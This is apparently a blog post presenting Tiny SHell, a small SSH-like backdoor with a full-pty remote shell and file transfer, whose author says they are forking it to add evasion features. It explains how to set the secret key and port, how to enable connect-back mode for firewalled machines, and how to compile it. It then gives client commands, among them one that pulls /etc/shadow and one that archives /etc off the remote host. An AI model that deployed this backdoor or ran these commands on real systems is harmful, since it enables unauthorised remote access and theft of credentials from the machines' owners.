Day 27: Tiny SHell (SSH-like backdoor with full-pty terminal)

Note: Why am I posting this? Because today I forked it and will add features plus allow recursive file transfer, also some sneaky evasion stuff too. So I am posting this to give you all a background to the tool and also so you can star it on Github for updates if you want to get early releases.

Tsh is a small ssh-like backdoor with full-pty terminal and with capability of file transfer. This tool has very small footprint and is easily built on most unix-like systems.

Before compiling Tiny SHell

  • First of all, you should setup your secret key, which is located in tsh.h; the key can be of any length (use at least 12 characters for better security).
  • It is advised to change SERVER_PORT, the port on which the server will be listening for incoming connections.
  • You may want to start tshd in “connect-back” mode if it runs on on a firewalled box; simply uncomment and modify CONNECT_BACK_HOST in tsh.h.

Compiling Tiny SHell

Run “make <system>”, where <system> can be any one of these: linux, freebsd, openbsd, netbsd, cygwin, sunos, irix, hpux, osf

How to use the server

It can be useful to set $HOME and the file creation mask before starting the server:

% umask 077; HOME=/var/tmp ./tshd 

How to use the client

Make sure tshd is running on the remote host.

Start a shell:

./tsh <hostname>

Execute a command:

./tsh <hostname> “uname -a” 

Transfer files:

./tsh <hostname> get /etc/shadow 
./tsh <hostname> put vmlinuz /boot

Multiple file transfers

At the moment, Tiny SHell does not support scp-like multiple and/or recursive file transfers. You can work around this bug by simply making a tar archive and transferring it.

./tsh host “stty raw; tar -cf — /etc 2>/dev/null” | tar -xvf 

On some brain-dead systems (actually, IRIX and HP-UX), Ctrl-C and other control keys do not work correctly. Fix it with:

% stty intr "^C" erase "^H" eof "^D" susp "^Z" kill "^U"

Security

Please remember that the secret key is stored in clear inside both tsh and tshd executables; therefore you should make sure that no one except you has read access to these two files. However, you may choose not to store the real (valid) key in the client, which will then ask for a password when it starts.